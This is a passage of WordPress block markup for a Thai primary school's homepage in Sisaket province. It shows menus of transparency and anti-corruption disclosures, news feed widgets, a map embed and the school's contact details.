data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":573,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-1.png\" alt=\"\" class=\"wp-image-573\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline 